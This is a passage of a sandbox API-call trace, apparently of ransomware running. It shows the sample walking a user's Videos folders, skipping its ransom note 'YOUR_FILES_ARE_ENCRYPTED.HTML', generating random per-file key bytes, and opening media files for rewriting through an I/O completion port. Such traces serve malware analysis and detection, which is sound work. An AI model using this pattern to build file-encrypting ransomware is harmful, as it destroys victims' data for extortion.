param_1="A6") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="ED") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="04") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="12") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C2") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="75") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="88") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="58") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="AD") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="A7") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="7A") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="36") returned 2 [0168.792] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" [0168.792] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.792] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0168.792] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="5SO4gw775L6f", cAlternateFileName="5SO4GW~1")) returned 1 [0168.792] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f") returned 43 [0168.792] GetProcessHeap () returned 0x270000 [0168.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.794] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f" [0168.794] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*" [0168.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) 
returned 1 [0168.795] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f55260, ftCreationTime.dwHighDateTime=0x1d7dfeb, ftLastAccessTime.dwLowDateTime=0xc0699980, ftLastAccessTime.dwHighDateTime=0x1d7e458, ftLastWriteTime.dwLowDateTime=0xc0699980, ftLastWriteTime.dwHighDateTime=0x1d7e458, nFileSizeHigh=0x0, nFileSizeLow=0x16369, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="0cO8Ok.avi", cAlternateFileName="")) returned 1 [0168.795] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi") returned 54 [0168.795] lstrcmpW (lpString1="0cO8Ok.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.795] PathFindExtensionW (pszPath="0cO8Ok.avi") returned=".avi" [0168.795] lstrlenW (lpString=".avi") returned 4 [0168.795] PathFindExtensionW (pszPath="0cO8Ok.avi") returned=".avi" [0168.795] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\0co8ok.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0168.796] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=90985) returned 1 [0168.796] GetProcessHeap () returned 0x270000 [0168.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0168.801] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4A") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="7E") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="02") returned 2 [0168.801] 
wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EF") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="29") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EB") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4C") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E1") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D5") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="4D") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="61") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="04") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="18") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="16") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="86") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="92") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EA") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="ED") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="94") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="1B") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="8B") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DA") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A7") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B6") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: 
param_1="03") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="40") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="46") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8F") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0168.802] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" [0168.802] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.802] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0168.802] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01dfc0, ftCreationTime.dwHighDateTime=0x1d7dfb0, ftLastAccessTime.dwLowDateTime=0x182326d0, ftLastAccessTime.dwHighDateTime=0x1d7e609, ftLastWriteTime.dwLowDateTime=0x182326d0, ftLastWriteTime.dwHighDateTime=0x1d7e609, nFileSizeHigh=0x0, nFileSizeLow=0x1654e, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="3g39kwXbO0F.flv", cAlternateFileName="3G39KW~1.FLV")) returned 1 [0168.802] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv") returned 59 [0168.802] lstrcmpW 
(lpString1="3g39kwXbO0F.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.802] PathFindExtensionW (pszPath="3g39kwXbO0F.flv") returned=".flv" [0168.802] lstrlenW (lpString=".flv") returned 4 [0168.802] PathFindExtensionW (pszPath="3g39kwXbO0F.flv") returned=".flv" [0168.803] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\3g39kwxbo0f.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0168.803] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=91470) returned 1 [0168.803] GetProcessHeap () returned 0x270000 [0168.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0168.806] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F7") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="10") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="BE") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F6") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="72") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D8") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AE") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="27") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: 
param_1="E8") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="23") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="50") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="10") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0C") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="19") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="93") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AA") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DA") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="44") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2C") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0A") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="21") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="39") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="50") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FA") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="18") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D0") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="28") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="45") returned 2 [0168.808] lstrcpyW (in: 
lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" [0168.808] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.808] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0168.808] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfc77380, ftCreationTime.dwHighDateTime=0x1d7d768, ftLastAccessTime.dwLowDateTime=0x7e17a9e0, ftLastAccessTime.dwHighDateTime=0x1d7e1b1, ftLastWriteTime.dwLowDateTime=0x7e17a9e0, ftLastWriteTime.dwHighDateTime=0x1d7e1b1, nFileSizeHigh=0x0, nFileSizeLow=0x4d1c, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="cBIayRuO2o1rUi4dxeN.flv", cAlternateFileName="CBIAYR~1.FLV")) returned 1 [0168.808] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv") returned 67 [0168.808] lstrcmpW (lpString1="cBIayRuO2o1rUi4dxeN.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.808] PathFindExtensionW (pszPath="cBIayRuO2o1rUi4dxeN.flv") returned=".flv" [0168.808] lstrlenW (lpString=".flv") returned 4 [0168.808] PathFindExtensionW (pszPath="cBIayRuO2o1rUi4dxeN.flv") returned=".flv" [0168.808] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\cbiayruo2o1rui4dxen.flv"), dwDesiredAccess=0xc0010000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.809] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=19740) returned 1 [0168.809] GetProcessHeap () returned 0x270000 [0168.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0168.811] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="21") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B7") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="A7") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="86") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E1") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="72") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="AD") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="06") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="83") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="EE") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3D") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="C7") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="70") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1F") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="CF") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="88") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda7a, 
param_2="%02X" | out: param_1="D2") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D0") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="52") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="87") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="45") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="41") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A1") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="28") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="6A") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="9E") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7B") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F5") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="64") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="92") returned 2 [0168.812] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0168.813] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" [0168.813] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.813] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0168.813] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="ff3aNZOdEdDnbufSZH", cAlternateFileName="FF3ANZ~1")) returned 1 [0168.813] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH") returned 62 [0168.813] GetProcessHeap () returned 0x270000 [0168.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0168.814] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH" [0168.814] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*" [0168.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName=".", 
cAlternateFileName="")) returned 0x42f31c0 [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x21774d00, ftCreationTime.dwHighDateTime=0x1d7d9df, ftLastAccessTime.dwLowDateTime=0xe46e3180, ftLastAccessTime.dwHighDateTime=0x1d7deb6, ftLastWriteTime.dwLowDateTime=0xe46e3180, ftLastWriteTime.dwHighDateTime=0x1d7deb6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a5fa10, ftCreationTime.dwHighDateTime=0x1d7da81, ftLastAccessTime.dwLowDateTime=0x1c07b6f0, ftLastAccessTime.dwHighDateTime=0x1d7dce8, ftLastWriteTime.dwLowDateTime=0x1c07b6f0, ftLastWriteTime.dwHighDateTime=0x1d7dce8, nFileSizeHigh=0x0, nFileSizeLow=0x14174, dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="7Zpw3f.swf", cAlternateFileName="")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\7Zpw3f.swf") returned 73 [0168.815] lstrcmpW (lpString1="7Zpw3f.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.815] PathFindExtensionW (pszPath="7Zpw3f.swf") returned=".swf" [0168.815] lstrlenW (lpString=".swf") returned 4 [0168.815] PathFindExtensionW (pszPath="7Zpw3f.swf") returned=".swf" [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d6fb6c0, ftCreationTime.dwHighDateTime=0x1d7e2d3, ftLastAccessTime.dwLowDateTime=0x395ce4c0, ftLastAccessTime.dwHighDateTime=0x1d7e5a6, ftLastWriteTime.dwLowDateTime=0x395ce4c0, ftLastWriteTime.dwHighDateTime=0x1d7e5a6, nFileSizeHigh=0x0, nFileSizeLow=0x130df, 
dwReserved0=0xff399580, dwReserved1=0xffffffff, cFileName="8LVO2zw 0SL.swf", cAlternateFileName="8LVO2Z~1.SWF")) returned 1 [0168.815] wnsprintfW (in: pszDest=0x749a470, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\8LVO2zw 0SL.swf") returned 78 [0168.815] lstrcmpW (lpString1="8LVO2zw 0SL.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.815] PathFindExtensionW (pszPath="8LVO2zw 0SL.swf") returned=".swf" [0168.815] lstrlenW (lpString=".swf") returned 4 [0168.815] PathFindExtensionW (pszPath="8LVO2zw 0SL.swf") returned=".swf" [0168.815] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x382bcb60, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x462cd7c0, ftLastAccessTime.dwHighDateTime=0x1d7e2de, 